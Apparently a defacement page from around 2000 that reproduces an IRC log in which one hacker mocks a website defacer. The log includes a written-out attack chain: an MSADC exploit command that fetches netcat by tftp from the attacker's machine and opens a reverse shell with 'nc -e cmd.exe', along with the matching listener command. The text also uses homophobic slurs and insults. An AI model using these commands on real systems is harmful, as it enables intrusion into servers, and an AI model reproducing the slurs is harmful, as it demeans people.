Security, anyone?
 trime, let's now see the hax0r in j00.

[trime] how do you upload html files with msadc?
[rugbyb0y] well since your gay defacements annoy me so much I will show you.
[rugbyb0y] first setup a tftp server on your linux box put netcat.exe 
	   in the tftp dir.
[rugbyb0y] then run your gay msadc script and type :
[rugbyb0y] cd c:\winnt && tftp -i $yourIP get nc.exe nc.exe && 
	   attrib -r nc.exe && nc -e cmd.exe $yourIP $port
[trime] ?!
[rugbyb0y] then on your gay fag redhat box run nc -l -n -v -p 1000 and 
	   it should connect to you on 1000.
[trime] I don't have linux installed at this moment, is there any other way?
[rugbyb0y] I have no more time for you kid go away , learn how to use a comp 
	   before you try breaking into one.
[trime] you there ?
 you dare fuckin accusing me of not knowing simple html and not even be able 
 to follow the simple instructions I gave you?.
 a few weeks later...
[trime] hey you there?
[rugbyb0y] uh ? what do you want ?
[trime] you got your wish team icon-51 is over
[rugbyb0y] great, tell that to someone who cares.
[trime] me and the huteam are going to team up
[rugbyb0y] eye fEER j00
[trime] we won't be doing any more defacements 
[rugbyb0y] tell that to yourself.

greetz :: PaPaNaAkO , me , poot-poooot and hacky.
fuck y0uz :: #oneball DalNet (they are ALL hopeless retards.)
admin :: nothing was hurt except your pride.
This one's for the people of the sun. [06/30/2K]